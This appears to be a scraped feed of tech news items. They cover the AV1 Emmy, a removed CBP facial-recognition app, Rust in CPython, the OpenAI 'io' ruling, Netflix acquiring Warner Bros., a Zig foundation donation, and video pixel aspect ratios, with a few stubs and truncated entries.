Gold Emmy-style statuette in front of green illuminated panels at an award ceremony podium.
The AV1 specification was honored with a Technology & Engineering Emmy Award on Dec. 4, 2025.

The web needed a new video codec

Through the mid-2010s, video codecs were an invisible tax on the web , built on a closed licensing system with expensive, unpredictable fees. Most videos online relied on the H.264 codec, which open-source projects like Firefox could only support without paying MPEG LA license fees thanks to Cisco’s open-source OpenH.264 module .

Especially as demand for video grew, the web needed a next-generation codec to make high-quality streaming faster and more reliable. H.265 promised efficiency gains, but there was no guarantee of another OpenH.264-style arrangement. The risk was another fragmented ecosystem where browsers like Firefox couldn’t play large portions of the web’s video.

Enter AV1

To solve this, Mozilla joined other technical leaders to form the Alliance for Open Media (AOM) in 2015 and started ambitious work on a next-generation codec built from Google’s VP9, Mozilla’s Daala, and Cisco’s Thor.

The result was AV1, released in 2018, which delivered top-tier compression as an open standard under a royalty-free patent policy. It’s now widely deployed across the streaming ecosystem, including hardware decoders and optimized software decoders which allow open-source browsers like Firefox to provide state of the art video compression to all users across the web.

AV1 is also the foundation for the image format AVIF , which is deployed across browsers and provides excellent compression for still and animated images (AVIF is based on a video codec, after all).

The Emmy award reflects the value of open standards, open-source software, and the sustained work by AOM participants and the broader community fighting for an open web.

Looking ahead to AV2

AV1 fixed a structural problem in the ecosystem at the time, but the work isn’t finished. Video demand keeps rising, and the next generation of open codecs must remain competitive.

AOMedia is working on the upcoming release of AV2 . It will feature meaningfully better compression than AV1, much higher efficiency for screen/graphical content, alpha channel support, and more.

As AV2 arrives, our goal remains unchanged: make video on the web open, efficient, and accessible to everyone.

DHS’s Immigrant-Hunting App Removed from Google Play Store

403 Media
www.404media.co
2025-12-05 17:05:47
The app, called Mobile Identify, was launched in November, and lets local cops use facial recognition to hunt immigrants on behalf of ICE. It is unclear if the removal is temporary or not....
Original Article

A Customs and Border Protection (CBP) app that lets local cops use facial recognition to hunt immigrants on behalf of the federal government has been removed from the Google Play Store, 404 Media has learned.

It is unclear if the removal is temporary or not, what the exact reason is for the removal, or if Google or CBP removed the app. Neither Google nor CBP immediately responded to a request for comment. Its removal comes after 404 Media documented multiple instances of CBP and ICE officials using their own facial recognition app to identify people and verify their immigration status, including people who said they were U.S. citizens.

The removal also comes after “hundreds” of Google employees took issue with the app, according to a source with knowledge of the situation.

“Google's a very big place, and most people at the company haven't heard anything about this, yet hundreds signaled their displeasure with the app approval, either directly in the internal report about the app, or in memes about it,” the source said. 404 Media granted multiple sources in this story anonymity to protect them from retaliation.

💡

Do you know anything else about this removal or app? I would love to hear from you. Using a non-work device, you can message me securely on Signal at joseph.404 or send me an email at joseph@404media.co.

“We're sorry, the requested URL was not found on this server,” the app’s Play Store page says at the time of writing.

CBP launched the app, called Mobile Identify, in November. It lets a police officer point their smartphone camera at a person, perform a face scan, and the app will tell the agency to contact ICE about the person or not. The app is designed “to identify and process individuals who may be in the country unlawfully,” according to the app’s Play Store page before it was removed.

As 404 Media reported at the time of the app’s launch, the Play Store page itself makes no mention of facial recognition. But 404 Media downloaded a copy of the app, compiled its code, and found clear references to scanning faces, such as a package called “facescanner.”

A source with knowledge of the app previously told 404 Media the app doesn’t return names after a face search. Instead it tells users to contact ICE and provides a reference number, or to not detain the person depending on the result.

The app is specifically for local and state agencies that are part of the 287(g) program, in which ICE delegates certain immigration-related powers to local and state agencies. Members of the 287(g) Task Force Model (TFM) are allowed to enforce immigration authorities during their ordinary police duties, and “essentially turns police officers into ICE agents,” according to the New York Civil Liberties Union .

Google previously told 404 Media in a statement “This app is only usable with an official government login and does not publicly broadcast specific user data or location. Play has robust policies and when we find a violation, we take action.” Critics saw a disconnect between Google hosting a CBP app for hunting immigrants, while at the same time removing apps that let local communities report sightings of ICE officials. Google previously described ICE officials as a vulnerable group in need of protection.

Mobile Identify is essentially a watered-down version of Mobile Fortify, a more powerful facial recognition app CBP and ICE are using in the field . That app, based on leaked emails and other material obtained by 404 Media, uses CBP systems usually reserved for identifying travellers entering the U.S., and turns that technology inwards. It queries a database of more than 200 million images when an ICE official scans a subject’s face, according to the material. It then returns a subject’s name, date of birth, “alien number,” and whether they’ve been given an order of deportation. That app is not publicly available, and instead can only be downloaded onto DHS-issued work devices.

An internal DHS document 404 Media obtained said ICE does not let people decline to be scanned by the app.

Before it was removed, the app had been downloaded more than a hundred times, according to 404 Media’s earlier review of the Play Store page.

About the author

Joseph is an award-winning investigative journalist focused on generating impact. His work has triggered hundreds of millions of dollars worth of fines, shut down tech companies, and much more.

Joseph Cox

Eventual Rust in CPython

Lobsters
lwn.net
2025-12-05 17:05:27
Comments...
Original Article

Emma Smith and Kirill Podoprigora, two of Python's core developers, have opened a discussion about including Rust code in CPython, the reference implementation of the Python programming language. Initially, Rust would only be used for optional extension modules, but they would like to see Rust become a required dependency over time. The initial plan was to make Rust required by 2028, but Smith and Podoprigora indefinitely postponed that goal in response to concerns raised in the discussion.

The proposal

The timeline given in their pre-PEP called for Python 3.15 (expected in October 2026) to add a warning to Python's configure script if Rust is not available when Python is built. Any uses of Rust would be strictly optional at that point, so the build wouldn't fail if it is missing. At this stage, Rust would be used in the implementation of the standard library, in order to implement native versions of Python modules that are important to the performance of Python applications, such as base64. Example code to accomplish this was included in the proposal. In 3.16, the configure script would fail if Rust is missing unless users explicitly provide the " --with-rust=no " flag. In 3.17 (expected in 2028), Python could begin strictly requiring Rust at build time — although it would not be required at run time, for users who get their Python installation in binary form.

Besides Rust's appeal as a solution to memory-safety problems, Smith cited that there are an increasing number of third-party Python extensions written in Rust as a reason to bring the proposal forward. Perhaps, if Rust code could be included directly in the CPython repository, the project would attract more contributors interested in bringing their extensions into the standard library, she said. The example in the pre-PEP was the base64 module, but she expressed hope that many areas of the standard library could see improvement. She also highlighted the Rust for Linux project as an example of this kind of integration going well.

No AI slop, all substance: subscribe to LWN today

LWN has always been about quality over quantity; we need your help to continue publishing in-depth, reader-focused articles about Linux and the free-software community. Please subscribe today to support our work and keep LWN on the air; we are offering a free one-month trial subscription to get you started.

Cornelius Krupp was apprehensive ; he thought that the Rust-for-Linux project was more of a cautionary tale, given the public disagreements between maintainers. Those disagreements have settled down over time, and the kernel community is currently integrating Rust with reasonable tranquility, but the Rust for Linux project still reminds many people of how intense disagreements over programming languages can get in an established software project. Jacopo Abramo had the same worry , but thought that the Python community might weather that kind of disagreement better than the kernel community has. Smith agreed with Abramo, saying that she expected the experience to be " altogether different " for Python.

Steve Dower had a different reason to oppose the proposal: he wasn't against the Rust part, but he was against adding additional optional modules to Python's core code. In his view, optional extensions should really live in a separate repository. Da Woods called out that the proposal wouldn't bring any new features or capabilities to Python. Smith replied (in the same message linked above) that the goal was to eventually introduce Rust into the core of Python, in a controlled way. So, the proposal wasn't only about enabling extension modules. That didn't satisfy Dower, however. He said that his experience with Rust, mixed-language code, and teams forced him to disapprove of the entire proposal. Several other community members agreed with his disapproval for reasons of their own.

Chris Angelico expressed concern that Rust might be more susceptible to a "trusting trust" attack (where a compiler is invisibly subverted to introduce targeted backdoors) than C, since right now Rust only has one usable compiler. Sergey Davidoff linked to the mrustc project, which can be used to show that the Rust compiler (rustc) is free of such attacks by comparing the artifacts produced from rustc and mrustc. Dower agreed that Rust didn't pose any more security risk than C, but also wasn't sure how it would provide any security benefits, given that CPython is full of low-level C code that any Rust code will need to interoperate with. Aria Desires pointed to the recent Android Security post about the adoption of Rust as evidence that mixed code bases adopting Rust do end up with fewer security vulnerabilities.

Not everyone was against the proposal, however. Alex Gaynor and James Webber both spoke up in favor. Guido van Rossum also approved , calling the proposal a great development and saying that he trusted Smith and others to guide the discussion.

Stephan Sokolow pointed out that many people were treating the discussion as being about " Rust vs. C ", but that in reality it might be " Rust vs. wear out and stop contributing ". Paul Moore thought that was an insightful point, and that the project should be willing to put in some work now in order to make contributing to the project easier in the future.

Nathan Goldbaum is a maintainer of the PyO3 project , which provides Rust bindings to the Python interpreter to support embedding Python in Rust applications and writing Python extensions in Rust. He said that having official Rust bindings would significantly reduce the amount of work he has to do to support new Python versions. Another PyO3 maintainer, David Hewitt, agreed , going on to suggest that perhaps CPython would benefit from looking at the API that PyO3 has developed over time and picking " the bits that work best ".

Raphael Gaschignard thought that the example Rust code Smith had provided would be a more compelling argument for adopting Rust if it demonstrated how using the language could simplify error handling and memory management compared to C code. Smith pointed out one such example, but concurred that the current proof-of-concept code wasn't a great demonstration of Rust's benefits in this area.

Gentoo developer Michał Górny said that the inclusion of Rust in CPython would be unfortunate for Gentoo, which supports many niche architectures that other distributions don't:

I do realize that these platforms are not "supported" by CPython right now. Nevertheless, even though there historically were efforts to block building on them, they currently work and require comparatively little maintenance effort to keep them working. Admittedly, the wider Python ecosystem with its Rust adoption puts quite a strain on us and the user experience worsens every few months, we still manage to provide a working setup.

[...]

That said, I do realize that we're basically obsolete and it's just a matter of time until some projects pulls the switch and force us to tell our users "sorry, we are no longer able to provide a working system for you".

Hewitt offered assistance with Górny's integration problems. " I build PyO3 [...] to empower more people to write software, not to alienate. " Górny appreciated the thought, but reiterated that the problem here was Rust itself and its platform support.

Scaling back

In response to the concerns raised in the discussion, Smith and Podoprigora scaled back the goals of the proposal, saying that it should be limited to using Rust for optional extension modules (i.e. speeding up parts of the standard library) for the foreseeable future. They still want to see Rust adopted in CPython's core eventually, but a more gradual approach should help address problems raised by bootstrapping, language portability, and related concerns that people raised in the thread, Smith said.

That struck some people as too conservative. Jelle Zijlstra said that if the proposal were limited to optional extension modules, it would bring complexity to the implementation of the standard library for a marginal benefit. Many people are excited about bringing Rust to CPython, Zijlstra said, but restricting Rust code to optional modules means putting Rust in the place that it will do the least good for the CPython code. Several other commenters agreed.

Smith pushed back , saying that moving to Rust was a long-term investment in the quality of the code, and that having a slow, conservative early period of the transition would help build out the knowledge and experience necessary to make the transition succeed. She later clarified that a lot of the benefit she saw from this overly careful proposal was doing the groundwork to make using Rust possible at all: sorting out the build-system integration, starting to gather feedback from users and maintainers, and prototyping what a native Rust API for Python could look like. All of that has to happen before it makes sense to consider Rust in the core code — so even though she eventually wants to reach that state, it makes sense to start here.

At the time of writing, the discussion is still ongoing. The Python community has not reached a firm conclusion about the adoption of Rust — but it has definitely ruled out a fast adoption. If Smith and Podoprigora's proposal moves forward, it still seems like it will be several years before Rust is adopted in CPython's core code, if it ever is. Still, the discussion also revealed a lot of enthusiasm for Rust — and that many people would rather contribute code written in Rust than attempt to wrestle with CPython's existing C code.




Onlook (YC W25) the Cursor for Designers Is Hiring a Founding Fullstack Engineer

Hacker News
news.ycombinator.com
2025-12-05 17:00:10
Comments...
Original Article

Hey HN! I'm Daniel, building Onlook, the Cursor for Designers. We built an open-source collaborative canvas for code that lets designers and developers craft incredible web experiences together.

Since launching, Onlook hit #1 on Hacker News, was the #1 trending repo on GitHub—above DeepSeek + Anthropic—and has earned over 23,000 GitHub stars. We’re looking to bring on Onlook’s first Founding Engineers.

This role requires autonomy - you’ll be setting standards for one of the fastest-growing open source projects backed by YC ever. You’ll help design and build an uncompromising visual IDE loved by tens of thousands of designers and engineers around the world, and you'll have a heavy influence on the direction of where we take the company.

You’re a full-stack engineer based in the U.S. who is ultra comfortable in Typescript, NextJS, React, and Tailwind, and ready to jump-in and build.

The most important things we look for:

• Olympic-level dedication – you want to be the best in the world at what you do.

• Ownership – you like autonomy and control over the destiny of the company.

• Speed – you’re comfortable shipping and iterating quickly with feedback.

• Craft – you’re opinionated and are willing to defend your opinions.

Ideally, you:

• Are looking for a fast-paced, early startup environment.

• Are willing to put in long hours and go the extra mile.

• Are comfortable with any part of the stack, front-end, back-end, or database.

• Believe in open source and are ok with your work being very public.

The comp range for this role is $130k-200k, 1-5% equity, great healthcare + other perks, and an awesome office if you happen to be in SF. We're open to remote / hybrid candidates.

If you’d like to stand out, please share a project or piece of work that you’re most proud of. We love seeing people’s work. If you have a personal website, please include that as well.

If you're interested, email daniel@onlook.com with your Github / LinkedIn / Website or work samples and why you'd be a great addition to the team, or apply here: https://www.ycombinator.com/companies/onlook/jobs/e4gHv1n-fo...

Excited to meet, and build alongside you!

Coupongogo: Remote-Controlled Crypto Stealer Targeting Developers on GitHub

Lobsters
www.rastersec.com
2025-12-05 16:50:24
Comments...
Original Article
Timed out getting readerview for https://www.rastersec.com/blog/coupongogo-cryptostealer

Jony Ive's OpenAI Device Barred from Using 'Io' Name

Hacker News
www.macrumors.com
2025-12-05 16:48:44
Comments...
Original Article

A U.S. appeals court has upheld a temporary restraining order that prevents OpenAI and Jony Ive's new hardware venture from using the name "io" for products similar to those planned by AI audio startup iyO, Bloomberg Law reports.

ive and altman
iyO sued OpenAI earlier this year after the latter announced its partnership with Ive's new firm, arguing that OpenAI's planned "io" branding was too close to its own name and related to similar AI-driven hardware. Court filings later showed that Ive and Sam Altman chose the name io in mid-2023, and that iyO CEO Jason Rugolo had approached Altman in early 2025 seeking funding for a project about "the future of human-computer interface." Altman declined, saying he was already working on "something competitive."

OpenAI countered that io's first product would not be a wearable device, and that Rugolo had voluntarily disclosed details about iyO while suggesting OpenAI acquire his company for $200 million. Despite this, a district court issued a temporary restraining order blocking OpenAI, Altman, Ive, and IO Products, Inc. from using the io mark in connection with products deemed sufficiently similar to iyO's planned AI-audio computer. OpenAI removed its io branding shortly after.

The Ninth Circuit affirmed the order earlier this week. The court agreed there was a likelihood of confusion between "IO" and "iyO," that reverse confusion was a significant risk given OpenAI's size, and that iyO could face irreparable harm to its brand and fundraising. However, the ruling does not bar all uses of the io name, only marketing and selling hardware similar to iyO's.

The case now returns to the district court for a preliminary injunction hearing in April 2026, with the broader litigation expected to extend into 2027 and 2028. OpenAI's first hardware device is expected to launch next year .

Popular Stories

When Will Apple Release iOS 26.2?

Monday December 1, 2025 4:37 pm PST by

We're getting closer to the launch of the final major iOS update of the year, with Apple set to release iOS 26.2 in December. We've had three betas so far and are expecting a fourth beta or a release candidate this week, so a launch could follow as soon as next week. Past Launch Dates Apple's past iOS x.2 updates from the last few years have all happened right around the middle of the...

Apple Pushes iPhone Users Still on iOS 18 to Upgrade to iOS 26

Tuesday December 2, 2025 11:09 am PST by

Apple is encouraging iPhone users who are still running iOS 18 to upgrade to iOS 26 by making the iOS 26 software upgrade option more prominent. Since iOS 26 launched in September, it has been displayed as an optional upgrade at the bottom of the Software Update interface in the Settings app. iOS 18 has been the default operating system option, and users running iOS 18 have seen iOS 18...

iPhone Fold: Launch, Pricing, and What to Expect From Apple's Foldable

Monday December 1, 2025 3:00 am PST by

Apple is expected to launch a new foldable iPhone next year, based on multiple rumors and credible sources. The long-awaited device has been rumored for years now, but signs increasingly suggest that 2026 could indeed be the year that Apple releases its first foldable device. Subscribe to the MacRumors YouTube channel for more videos. Below, we've collated an updated set of key details that ...

Apple Seeds iOS 26.2 and iPadOS 26.2 Release Candidates to Developers and Public Beta Testers

Wednesday December 3, 2025 10:33 am PST by

Apple today seeded the release candidate versions of upcoming iOS 26.2 and iPadOS 26.2 updates to developers and public beta testers, with the software coming two weeks after Apple seeded the third betas. The release candidates represent the final versions of iOS 26.2 and iPadOS 26.2 that will be provided to the public if no further bugs are found during this final week of testing....

John Gruber Shares Scathing Commentary About Apple's Departing Software Design Chief

Thursday December 4, 2025 9:30 am PST by

In a statement shared with Bloomberg on Wednesday, Apple confirmed that its software design chief Alan Dye will be leaving. Apple said Dye will be succeeded by Stephen Lemay, who has been a software designer at the company since 1999. Meta CEO Mark Zuckerberg announced that Dye will lead a new creative studio within the company's AR/VR division Reality Labs. On his blog Daring Fireball,...

iPhone 17 Demand Is Breaking Apple's Sales Records

Tuesday December 2, 2025 9:44 am PST by

Apple's iPhone 17 lineup is selling well enough that Apple is on track to ship more than 247.4 million total iPhones in 2025, according to a new report from IDC. Total 2025 shipments are forecast to grow 6.1 percent year over year due to iPhone 17 demand and increased sales in China, a major market for Apple. Overall worldwide smartphone shipments across Android and iOS are forecast to...

Here Are the Four MacBooks Apple Is Expected to Launch Next Year

Monday December 1, 2025 5:00 am PST by

2026 could be a bumper year for Apple's Mac lineup, with the company expected to announce as many as four separate MacBook launches. Rumors suggest Apple will court both ends of the consumer spectrum, with more affordable options for students and feature-rich premium lines for users that seek the highest specifications from a laptop. Below is a breakdown of what we're expecting over the next ...

iPhone Air's Resale Value Has Dropped Dramatically, Data Shows

The iPhone Air has recorded the steepest early resale value drop of any iPhone model in years, with new data showing that several configurations have lost almost 50% of their value within ten weeks of launch. According to a ten-week analysis published by SellCell, Apple's latest lineup is showing a pronounced split in resale performance between the iPhone 17 models and the iPhone Air....

iPhone 17 Pro Lost a Camera Feature Pro Models Have Had Since 2020

Thursday December 4, 2025 5:18 am PST by

iPhone 17 Pro models, it turns out, can't take photos in Night mode when Portrait mode is selected in the Camera app – a capability that's been available on Apple's Pro devices since the iPhone 12 Pro in 2020. If you're an iPhone 17 Pro or iPhone 17 Pro Max owner, try it for yourself: Open the Camera app with Photo selected in the carousel, then cover the rear lenses with your hand to...

10 Reasons to Wait for Next Year's iPhone 18 Pro

Monday December 1, 2025 2:40 am PST by

Apple's iPhone development roadmap runs several years into the future and the company is continually working with suppliers on several successive iPhone models at the same time, which is why we often get rumored features months ahead of launch. The iPhone 18 series is no different, and we already have a good idea of what to expect for the iPhone 18 Pro and iPhone 18 Pro Max. One thing worth...

Netflix Agrees to Buy Warner Bros., Including HBO, for $83 Billion

Daring Fireball
www.latimes.com
2025-12-05 16:47:44
Meg James, reporting for The Los Angeles Times (News+ link): The two companies announced the blockbuster deal early Friday morning. The takeover would give Netflix such beloved characters as Batman, Harry Potter and Fred Flintstone. Fred Flintstone? “Our mission has always been to entertai...
Original Article

Netflix has prevailed in its bid to buy Warner Bros., agreeing to pay $72 billion for the Burbank-based Warner Bros. film and television studios, HBO Max and HBO.

The two companies announced the blockbuster deal early Friday morning. The takeover would give Netflix such beloved characters as Batman, Harry Potter and Fred Flintstone.

“Our mission has always been to entertain the world,” Ted Sarandos, co-CEO of Netflix, said in a statement. “By combining Warner Bros.’ incredible library of shows and movies — from timeless classics like ‘Casablanca’ and ‘Citizen Kane’ to modern favorites like ‘Harry Potter’ and ‘Friends’ — with our culture-defining titles like ‘Stranger Things,’ ‘KPop Demon Hunters’ and ‘Squid Game,’ we’ll be able to do that even better.”

Netflix’s cash and stock transaction is valued at about $27.75 per Warner Bros. Discovery share. Netflix also agreed to take on more than $10 billion in Warner Bros. debt, pushing the deal’s value to $82.7 billion.

The breakthrough came earlier this week, after the three contenders — Netflix, Paramount and Comcast — submitted binding second-round offers. Netflix’s victory was assured by late Thursday, soon after another deadline for last-minute deal sweeteners. Netflix and Warner’s boards separately and unanimously approved the transaction.

Warner’s cable channels, including CNN, TNT and HGTV, are not included in the deal. They will form a new publicly traded company, Discovery Global, in mid-2026.

Anti-trust experts anticipate opposition to Netflix’s proposed takeover. Netflix has more than 300 million streaming subscribers worldwide, and with HBO Max, the company’s base would swell to more than 420 million subscribers — a staggering sum much greater than any of the other premium video-on-demand streaming services.

In addition, Netflix has long prioritized releasing movies to its streaming platform — bypassing movie theater chains.

The deal posed “an unprecedented threat to the global exhibition business,” Cinema United, a trade group representing owners of more than 50,000 movie screens, said in a statement announcing its opposition.

“The negative impact of this acquisition will impact theatres from the biggest circuits to one-screen independents in small towns in the United States and around the world,” Cinema United President Michael O’Leary said in a statement. “Netflix’s stated business model does not support theatrical exhibition.”

Netflix, in the statement, said it would maintain Warner Bros. operations, including theatrical releases for Warner Bros. films.

The Directors Guild of America said the proposed combination “raises significant concerns.”

“A vibrant, competitive industry — one that fosters creativity and encourages genuine competition for talent — is essential to safeguarding the careers and creative rights of directors and their teams,” the DGA spokesperson said. “We will be meeting with Netflix to outline our concerns and better understand their vision for the future of the company.”

Losing the auction is a crushing blow for Paramount’s David Ellison, the 42-year-old tech scion who envisioned building a juggernaut with the two storied movie studios, HBO and two dozen cable channels.

One month after buying Paramount, he set his sights on Warner Bros., triggering the auction with a series of unsolicited bids in September and early October.

But Warner Bros. Discovery’s board rejected Paramount’s offers as too low. In late October, the board opened the auction up to other bidders.

Comcast also leaped into the bidding for Warner’s studios, HBO and its streaming service. Comcast wanted to spin off its NBCUniversal media assets and merge them with Warner Bros. to form a new jumbo studio.

More to Read

X hit with $140M EU fine for breaching content rules

Hacker News
www.reuters.com
2025-12-05 16:42:13
Comments...
Original Article

Please enable JS and disable any ad blocker

Synadia and TigerBeetle Pledge $512,000 to the Zig Software Foundation

Hacker News
tigerbeetle.com
2025-12-05 16:38:30
Comments...
Original Article

Synadia and TigerBeetle have together pledged $512,000 to the Zig Software Foundation over the next two years in support of the language, leadership, and communities building the future of simpler systems software.

I first saw Zig in 2018, seven years ago. Two years later, I chose Zig over C or Rust for TigerBeetle.

In 2020, I was following Rust closely. At the time, Rust’s default memory philosophy was to crash when out of memory (OOM). However, for TigerBeetle, I wanted explicit static allocation, following NASA’s Power of Ten Rules for Safety-Critical Code , which would become a part of TigerStyle , a methodology for creating safer software in less time .

What I learned is that if you could centralize resource allocation in time and space (the dimensions that prove tricky for humans writing software) then this could not only simplify memory management, to design away some of the need for a borrow checker in the first place, but, more importantly, also be a forcing function for propagating good design, to encourage teams to think through the explicit limits or physics of the software (you have no choice).

From a performance perspective, I didn’t want TigerBeetle to be fearlessly multithreaded. Transaction processing workloads tend to have inherent contention , even to the point of power law, precluding partitioning and necessitating a single-threaded architecture. Therefore, Rust’s borrow checker, while a phenomenal tool for the class of problems it targets, made less sense for TigerBeetle. TigerBeetle never frees memory and never runs multithreaded, instead using explicit submission/completion queue interfaces by design.

Finally, while the borrow checker could achieve local memory safety, TigerBeetle needed more correctness properties. TigerBeetle needed to be always correct, and across literally thousands of invariants. As matklad would say, this is a harder problem! I had also spent enough time in memory safe languages to know that local memory safety is no guarantee of local correctness, let alone distributed system correctness. Per systems thinking, I believe that total correctness is a design problem, not a language problem. Language is valuable. But no human language can guarantee the next Hemingway or Nabokov. For this you need philosophy. Even then it’s not a guarantee but a probability.

With Rust off the table, the choice fell to C or Zig. A language of the past or future?

Zig was early, which gave me pause, but I felt that the quality of Andrew Kelley’s design decisions in the language, the standard library (e.g. the unmanaged hashmap interface) and the cross-compilation toolchain, even five years ago, was already exceptional.

Andrews’s philosophy resonated with what I wanted to explore in TigerStyle. No hidden memory allocations. No hidden control flow. No preprocessor. No macros. And then you get things like comptime, reducing the grammar and dimensionality of the language, while simultaneously multiplying its power. The primary benefit of Zig is the favorable ratio of expressivity to language complexity.

As a replacement for C, Zig fixed not only the small cuts, such as explicit alignment in the type system for Direct I/O, or safer casts, but the showstoppers of spatial memory safety through bounds checking, and, to a lesser degree (but not guarantee), temporal memory safety through the debug allocator.

Zig also enabled checked arithmetic by default in safe builds, which is something I believe only Ada and Swift do (remarkably, Rust disables checked arithmetic by default in safe builds—a default I would love to see changed). TigerBeetle separates the data plane from the control plane by design, through batching, so the runtime cost of these safety checks was not material, being amortized in the data plane across bigger buffers. While a borrow checker or static allocation can simplify memory management, getting logic and arithmetic correct remains hard. Of course, you can enable checked arithmetic in other languages, but I appreciated Andrew’s concern for checked arithmetic and stricter operands by default.

In all these things, what impressed me most was Zig’s approach to safety when working with the metal. Not in terms of an on/off decision, but as a spectrum. Not aiming for 100% guarantees across 1 or 2 categories, but 90% and then across more categories. Not eliminating classes of bugs, but downgrading their probability. All while preserving the power-to-weight ratio of the language, to keep the language beautifully simple.

Many languages start simple and grow complex as features are added. Zig’s simplicity is unusual in that it comes from a subtractive discipline (e.g. no private fields) rather than a deferred complexity; minimizing surface area is part of the ethos of the language. The simplicity of Zig meant that we could hire great programmers from any language background—they could pick up Zig in a weekend. Indeed, I’ve never had to talk to a new hire about learning Zig.

Finally, there was the timing. Recognizing that TigerBeetle would take time to reach production (we shipped production in 2024, after 3.5 years of development), giving Zig time to mature, for our trajectories to intersect.

Investing in creating a database like TigerBeetle is a long term effort. Databases tend to have a long half life (e.g. Postgres is 30 years old). And so, while Zig being early in 2020 did give me pause, nevertheless Zig’s quality, philosophy and simplicity made sense for a multi-decade horizon.

How has the decision for Zig panned out?

TigerBeetle is tested end-to-end under some pretty extreme fuzzing. We did have three bugs that would have been prevented by the borrow checker, but these were caught by our fuzzers and online verification. We run a fuzzing fleet of 1,000 dedicated CPU cores 24/7. We invest in deterministic simulation testing (e.g. VOPR ), as well as non-deterministic fault-injection harnesses (e.g. Vörtex ). We engaged Kyle Kingsbury in one of the longest Jepsen audits to date —four times the typical duration. Through all this, Zig’s quality held up flawlessly.

Zig has also been a huge part of our success as a company. TigerBeetle is only 5 years old but is already migrating some of the largest brokerages, exchanges and wealth managements in their respective jurisdictions. Several of our key enterprise contracts were thanks to the CTOs and even CEOs of these companies also following Zig and seeing the quality we wanted to achieve with it. I don’t think we could have written TigerBeetle as it is, in any other language , at least not to the same tight tolerances, let alone with the same velocity.

Zig’s language specification will only reach 1.0 when all experimental areas of the language (e.g. async I/O) are finally done. For TigerBeetle, we care only about the stable language features we use, testing our binaries end to end, as we would for any language. Nevertheless, upgrading to new versions, even with breaking changes, has only been a pleasure for us as a team. The upgrade work is usually fully paid for by compilation time reduction. For example, the upgrade from Zig 0.14.1 to Zig 0.15.2 (with the native x86_64 backend) makes debug builds 2x faster, and even LLVM release builds become 1.6x faster. With each release, you can literally feel the sheer amount of effort that the entire Zig core team put into making Zig the world’s most powerful programming language—and toolchain.

Back in 2020, from a production perspective, Zig was more or less a frontend to LLVM, the same compiler used by Rust, Swift and other languages. However, by not shying away from also investing in its own independent compiler backends and toolchain, by appreciating the value of replacing LLVM long term, Zig is becoming well positioned to gain a low-level precision and compilation speed that generic LLVM won’t always be able to match.

We want Andrew to take his time, to get these things right for the long term. Fred Brooks once said that conceptual integrity is “the most important consideration” in system design, that the design must proceed from one mind.

In this spirit, I am grateful for Andrew’s remarkably strong leadership (and taste) in the design of the language and toolchain. There can be thankless pressure on an open source project to give in to the tragedy of the commons. But if anything, in hindsight I think this is what I’ve most appreciated about choosing Zig for TigerBeetle, that Zig has a strong BDFL.

Of course, some may hear “BDFL” and see governance risk. But I fear the opposite: conceptual risk, the harder problem. Brooks was right—conceptual integrity is almost certainly doomed by committee. Whereas governance is easier solved: put it in the hands, not of the corporates, but of the people. The individuals who choose each day to continue to donate.

This is why our pledge today, along with all other ZSF donors, is a simple donation with no strings attached. The Zig Software Foundation is well managed, transparent and independent. We want it to remain this way. The last thing we want is some kind of foundation “seat”. Andrew is Chef. We want to let him cook, and pay his core team sustainably (e.g. 92% percent of budget goes to directly paying contributors ).

If cooking is one metaphor, then surfing is another. I believe that technology moves in waves. The art is not in paddling to the wave with a thousand surfers on it. But in spotting the swell before it breaks. And then enjoying the ride with the early adopters who did the same. River , Ghostty , Bun , Mach and many fellow surfers.

In fact, it was through Zig that I met Derek Collison , who like me had been sponsoring the language in his personal capacity since 2018. As a former CTO at VMware, Derek was responsible for backing antirez to work full time on Redis. Derek later went on to create NATS , founding Synadia .

As we were about to increase TigerBeetle’s yearly donation to Zig, I reached out to Derek, and we decided to do a joint announcement, following Mitchell Hashimoto’s lead . For each of our companies to donate $256,000 in monthly installments over the next two years, with Synadia matching TigerBeetle, for a total of $512,000—the first installment already made.

Please consider donating or increasing your donation if you can. And if you are a CEO or CTO, please team up with another company to outmatch us! Thanks Andrew for creating something special, and to all who code for the joy of the craft:

Together we serve the users.

When square pixels aren’t square

Lobsters
alexwlchan.net
2025-12-05 16:38:03
Comments...
Original Article

When I embed videos in web pages, I specify an aspect ratio . For example, if my video is 1920 × 1080 pixels, I’d write:

<video style="aspect-ratio: 1920 / 1080">

If I also set a width or a height, the browser now knows exactly how much space this video will take up on the page – even if it hasn’t loaded the video file yet. When it initially renders the page, it can leave the right gap, so it doesn’t need to rearrange when the video eventually loads. (The technical term is “reducing cumulative layout shift ”.)

That’s the idea, anyway.

I noticed that some of my videos weren’t fitting in their allocated boxes. When the video file loaded, it could be too small and get letterboxed, or be too big and force the page to rearrange to fit. Clearly there was a bug in my code for computing aspect ratios, but what?

Three aspect ratios, one video

I opened one of the problematic videos in QuickTime Player, and the resolution listed in the Movie Inspector was rather curious: Resolution: 1920 × 1080 (1350 × 1080) .

The first resolution is what my code was reporting, but the second resolution is what I actually saw when I played the video. Why are there two?

The storage aspect ratio (SAR) of a video is the pixel resolution of a raw frame. If you extract a single frame as a still image, that’s the size of the image you’d get. This is the first resolution shown by QuickTime Player, and it’s what I was reading in my code.

I was missing a key value – the pixel aspect ratio (PAR) . This describes the shape of each pixel, in particular the width-to-height ratio. It tells a video player how to stretch or squash the stored pixels when it displays them. This can sometimes cause square pixels in the stored image to appear as rectangles.

A 3×3 grid of pixels, where each pixel is a rectangle that's taller than it is wide. A 3×3 grid of pixels, where each pixel is a square. A 3×3 grid of pixels, where each pixel is a rectangle that's wider than it is tall.
PAR < 1
portrait pixels
PAR = 1
square pixels
PAR > 1
landscape pixels

This reminds me of EXIF orientation for still images – a transformation that the viewer applies to the stored data. If you don’t apply this transformation properly, your media will look wrong when you view it. I wasn’t accounting for the pixel aspect ratio in my code.

According to Google, the primary use case for non-square pixels is standard-definition televisions which predate digital video. However, I’ve encountered several videos with an unusual PAR that were made long into the era of digital video, when that seems unlikely to be a consideration. It’s especially common in vertical videos like YouTube Shorts, where the stored resolution is a square 1080 × 1080, and the aspect ratio makes it a portrait.

I wonder if it’s being introduced by a processing step somewhere? I don’t understand why, but I don’t have to – I’m only displaying videos, not producing them.

The display aspect ratio (DAR) is the size of the video as viewed – what happens when you apply the pixel aspect ratio to the stored frames. This is the second resolution shown by QuickTime Player, and it’s the aspect ratio I should be using to preallocate space in my video player.

These three values are linked by a simple formula:

DAR = SAR × PAR

The size of the viewed video is the stored resolution times the shape of each pixel.

The stored frame may not be what you see

